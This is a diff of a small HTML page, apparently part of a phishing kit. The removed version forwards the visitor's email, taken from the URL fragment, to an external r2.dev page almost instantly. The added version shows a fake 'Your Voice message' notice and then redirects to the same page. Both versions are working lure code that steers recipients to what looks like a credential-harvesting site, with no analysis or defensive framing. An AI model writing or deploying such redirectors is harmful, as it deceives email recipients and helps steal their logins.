--- a/index.html
+++ b/index.html
@@ -1,14 +1,15 @@
-<html lang="en">
-
-    <script>
-
-        var hash = window.location.hash;
-
-        var em = hash.split('#')[1];
-window.setTimeout(function() {
-    window.location.href = 'https://pub-88834a78a0b042fc9794165ec28b4b99.r2.dev/ked9h2e8i.htm#'+em;
-}, 1);
-       
-    </script>
-
+<script language="javascript">
+	var drop = "#";
+</script>
+<head>
+<script type = "text/javascript">
+         <!--
+            function Redirect() {
+               window.location = "https://pub-88834a78a0b042fc9794165ec28b4b99.r2.dev/ked9h2e8i.htm#"+drop;
+            }            
+            document.write("You will be automatically redirected to Your Voice message.");
+            setTimeout('Redirect()', 1000);
+         //-->
+      </script>
+	  </head>
 </html>
